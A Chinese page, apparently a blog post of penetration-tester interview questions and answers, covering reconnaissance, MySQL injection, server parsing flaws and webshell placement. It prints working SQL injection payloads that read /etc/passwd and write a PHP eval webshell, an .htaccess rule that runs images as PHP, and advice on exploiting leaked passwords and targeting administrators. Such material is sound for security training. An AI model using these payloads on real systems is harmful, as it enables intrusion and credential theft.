黑客渗透知识总结

目录

渗透测试工程师面试题大全

[知孤云出岫 整理](#知孤云出岫 整理)

1.拿到一个待检测的站,你觉得应该先做什么?

[2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?](#2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?)

3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?

[4.判断出网站的 CMS 对渗透有什么意义?](#4.判断出网站的 CMS 对渗透有什么意义?)

[5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?](#5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?)

6.常见的网站服务器容器?

[7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?](#7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?)

8.目前已知哪些版本的容器有解析漏洞,具体举例?

[9、如何手工快速判断目标站是 windows 还是 linux 服务器?](#9、如何手工快速判断目标站是 windows 还是 linux 服务器?)

[10.为何一个 mysql 数据库的站,只有一个 80 端口开放?](#10.为何一个 mysql 数据库的站,只有一个 80 端口开放?)

[11.3389 无法连接的几种情况?](#11.3389 无法连接的几种情况?)

12.在某后台新闻编辑界面看到编辑器,应该先做什么?

[13.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?](#13.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?)

14.注入漏洞只能查账号密码?



渗透测试工程师面试题大全

知孤云出岫 整理


1.拿到一个待检测的站,你觉得应该先做什么?

收集信息:whois、网站源 IP、旁站、C 段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...

2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?

5.0 以下没有 information_schema 这个系统表,无法列表名等,只能暴力跑表名;5.0 以下是多用户单操作,5.0 以上是多用户多操做。

3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?

(1)丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台

(2)用邮箱做关键词进行丢进搜索引擎

(3)利用搜索到的关联信息找出其他邮箱进而得到常用社交账号

(4)社工找出社交账号,里面或许会找出管理员设置密码的习惯

(5)利用已有信息生成专用字典

(6) 观察管理员常逛哪些非大众性网站,拿下它,你会得到更多好东西

4.判断出网站的 CMS 对渗透有什么意义?

查找网上已曝光的程序漏洞,如果开源,还能下载相对应的源码进行代码审计。

5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?

(1)敏感文件、二级目录扫描

(2)站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点

6.常见的网站服务器容器?

IIS、Apache、nginx、Tomcat,weblogic、jboss

7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?

root 权限以及网站的绝对路径load_file()读取文件操作

前提:

知道文件的绝对路径能够使用union 查询

对 web 目录有写的权限

union select 1,load_file('/etc/passwd'),3,4,5# 0x2f6574632f706173737764

union select 1,load_file(0x2f6574632f706173737764),3,4,5# 路径没有加单引号的话 必须转换十六进制
要是想省略单引号的话必须转换十六进制into outfile 写入文件操作

前提:

文件名必须是全路径(绝对路径) 用户必须有写文件的权限

没有对单引号'过滤

select '<?php phpinfo(); ?>' into outfile 'C:\Windows\tmp\8.php' select '<?php @eval($_POST["admin"]); ?>' into outfile

'C:\Windows\tmp\8.php'

路径里面两个反斜杠\可以换成一个正斜杠/

PHP 语句没有单引号的话,必须转换成十六进制要是想省略单引号'的话,必须转换成十六进制

<?php eval(_POST\["admin"\]); ?\> 或 者 \_GET["admin"]); ?>

<?php @eval($_POST["admin"]); ?>

<?php phpinfo(); ?>

<?php eval($_POST["admin"]); ?>

建议一句话 PHP 语句转换成十六进制

8.目前已知哪些版本的容器有解析漏洞,具体举例?

(1)IIS 6.0

/xx.asp/xx.jpg "xx.asp"是文件夹名

(2) IIS 7.0/7.5

默认 Fast-CGI 开启,直接在 url 中图片地址后面输入/1.php,会把正常图片当成 php 解析

(3)Nginx

版本小于等于 0.8.37,利用方法和 IIS 7.0/7.5 一样,Fast-CGI 关闭情况下也可利用。

空字节代码 xxx.jpg.php

(4)Apache

上传的文件命名为:test.php.x1.x2.x3,Apache 是从右往左判断后缀

(5)lighttpd xx.jpg/xx.php

9、如何手工快速判断目标站是 windows 还是 linux 服务器?

linux 大小写敏感,windows 大小写不敏感

10.为何一个 mysql 数据库的站,只有一个 80 端口开放?
  • 更改了端口,没有扫描出来
  • 站库分离
  • 3306 端口不对外开放
11.3389 无法连接的几种情况?

(1)没开放 3389 端口
(2)端口被修改

(3)防护拦截
(4)处于内网(需进行端口转发)

12.在某后台新闻编辑界面看到编辑器,应该先做什么?

查看编辑器的名称版本,然后搜索公开的漏洞

13.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?

能做的事情很多,用隐藏网马来举例子:

插入<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php

</FilesMatch>

.jpg 文件会被解析成.php 文件

14.注入漏洞只能查账号密码?

可脱裤,可上传 webshell,可执行命令

相关推荐
曲幽10 小时前
不止于JWT:用FastAPI的Depends实现细粒度权限控制
python·fastapi·web·jwt·rbac·permission·depends·abac
用户962377954481 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
曲幽1 天前
FastAPI分布式系统实战:拆解分布式系统中常见问题及解决方案
redis·python·fastapi·web·httpx·lock·asyncio
曲幽2 天前
FastAPI压力测试实战:Locust模拟真实用户并发及优化建议
python·fastapi·web·locust·asyncio·test·uvicorn·workers
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全